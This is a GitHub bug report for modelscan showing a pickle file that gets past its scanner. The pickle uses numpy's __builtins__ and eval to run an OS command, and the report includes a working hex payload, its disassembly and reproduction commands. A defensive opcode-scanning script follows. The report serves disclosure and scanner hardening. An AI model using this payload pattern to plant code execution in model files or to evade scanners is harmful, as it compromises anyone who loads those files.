
[BUG] Security Vulnerability #330


@raghavverma-cpu

Describe the bug
Modelscan scanned our malicious pickle file using modelscan.scanners.PickleUnsafeOpScan and reported no issues.

To Reproduce
Steps to reproduce the behavior:
The disassembly of the malicious file looks like this:

    0: \x80 PROTO      4
    2: \x95 FRAME      102
   11: \x8c SHORT_BINUNICODE 'numpy'
   18: \x8c SHORT_BINUNICODE 'size'
   24: \x93 STACK_GLOBAL
   25: \x94 MEMOIZE    (as 0)
   26: \x94 MEMOIZE    (as 1)
   27: \x8c SHORT_BINUNICODE 'numpy'
   34: \x8c SHORT_BINUNICODE '__builtins__'
   48: \x93 STACK_GLOBAL
   49: \x94 MEMOIZE    (as 2)
   50: \x94 MEMOIZE    (as 3)
   51: h    BINGET     1
   53: }    EMPTY_DICT
   54: }    EMPTY_DICT
   55: \x8c SHORT_BINUNICODE 'shape'
   62: h    BINGET     3
   64: s    SETITEM
   65: \x86 TUPLE2
   66: b    BUILD
   67: h    BINGET     1
   69: h    BINGET     1
   71: \x8c SHORT_BINUNICODE 'eval'
   77: \x86 TUPLE2
   78: R    REDUCE
   79: \x8c SHORT_BINUNICODE '__import__("os").system("id")'
  110: \x85 TUPLE1
  111: R    REDUCE
  112: .    STOP
  1. Run echo "80049566000000000000008c056e756d70798c0473697a659394948c056e756d70798c0c5f5f6275696c74696e735f5f93949468017d7d8c0573686170656803738662680168018c046576616c86528c1d5f5f696d706f72745f5f28226f7322292e73797374656d28226964222985522e" | xxd -r > numpy_allowlist.pkl
  2. Run python3 -m pickle numpy_allowlist.pkl and the output for the id command should be displayed in stdout.
  3. Run modelscan -p numpy_allowlist.pkl to see that no issues were found

Expected behavior
Given that the pickle file uses numpy to execute malicious code, it is unexpected to see NumpyUnsafeOpScan not being used here to flag this behavior.

Screenshots
Image
The above screenshot demonstrates Modelscan not reporting any issues for the malicious file we created

Environment (please complete the following information):

  • OS: Debian Linux
  • Modelscan Version 0.8.7
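The allowlist gap this report describes (a module on the allowlist, numpy, used to reach __builtins__ and from there eval) can be checked at the opcode level without ever loading the file. The following is an added illustration, not modelscan's code and not code from the reporter: it walks the pickle with pickletools.genops, collects every GLOBAL / STACK_GLOBAL target, and flags both non-allowlisted modules and dunder attributes resolved through an allowlisted one. The ALLOWED_MODULES set is a hypothetical stand-in for a scanner's configuration; the sample bytes are the hex from the reproduction step above, and the two benign pickles are constructed inline.

```python
import pickle
import pickletools
from collections import OrderedDict

# The pickle from the reproduction step above, decoded from the issue's hex.
# It is only disassembled here; pickletools.genops never executes opcodes.
ISSUE_PICKLE = bytes.fromhex(
    "80049566000000000000008c056e756d70798c0473697a659394948c056e756d70798c0c5f5f6275696c74696e735f5f93949468017d7d8c0573686170656803738662680168018c046576616c86528c1d5f5f696d706f72745f5f28226f7322292e73797374656d28226964222985522e"
)

# Hypothetical allowlist of modules a model file may reference; a real scanner
# would read this from configuration. 'numpy' is included on purpose so the
# check mirrors the situation in the report.
ALLOWED_MODULES = {"numpy", "numpy.core.multiarray", "collections", "torch"}

# Opcodes that push a string constant onto the unpickler stack.
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}


def extract_globals(data):
    """Return (offset, module, name) for every GLOBAL / STACK_GLOBAL in the stream.

    Heuristic: STACK_GLOBAL takes module and name from the stack, so the two
    most recent string constants are used. A stream that memoizes the strings
    and re-pushes them with BINGET would need a fuller stack simulation; that
    case is noted here, not handled.
    """
    found = []
    recent_strings = []
    for op, arg, pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            recent_strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                module, name = recent_strings[-2], recent_strings[-1]
            else:
                module, name = "<unknown>", "<unknown>"
            found.append((pos, module, name))
        elif op.name == "GLOBAL":
            # pickletools renders the GLOBAL argument as "module name"
            module, name = arg.split(" ", 1)
            found.append((pos, module, name))
    return found


def scan_pickle(data):
    """Flag globals outside the allowlist, and dunder attributes resolved
    through an allowlisted module (the numpy.__builtins__ pattern above)."""
    findings = []
    for pos, module, name in extract_globals(data):
        if module not in ALLOWED_MODULES:
            findings.append(f"offset {pos}: {module}.{name} is outside the allowlist")
        elif name.startswith("__") and name.endswith("__"):
            findings.append(
                f"offset {pos}: dunder attribute {module}.{name} resolved as a global")
    return findings


def benign_samples():
    """Constructed benign pickles: a plain dict (no globals at all) and an
    OrderedDict, which references collections.OrderedDict via STACK_GLOBAL."""
    return [pickle.dumps({"weights": [0.1, 0.2]}, protocol=4),
            pickle.dumps(OrderedDict(layer=1), protocol=4)]


if __name__ == "__main__":
    for line in scan_pickle(ISSUE_PICKLE):
        print(line)
    for sample in benign_samples():
        print("benign:", scan_pickle(sample))
```

Run against the issue's file, the only finding is the STACK_GLOBAL at offset 48 (numpy.__builtins__); numpy.size at offset 24 passes because numpy is allowlisted, which is exactly why a per-module allowlist alone is not enough. The dunder rule is the smallest addition that closes this particular route; it does not try to follow what the later REDUCE calls do, which is where a fuller scanner would continue.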

Labels: bug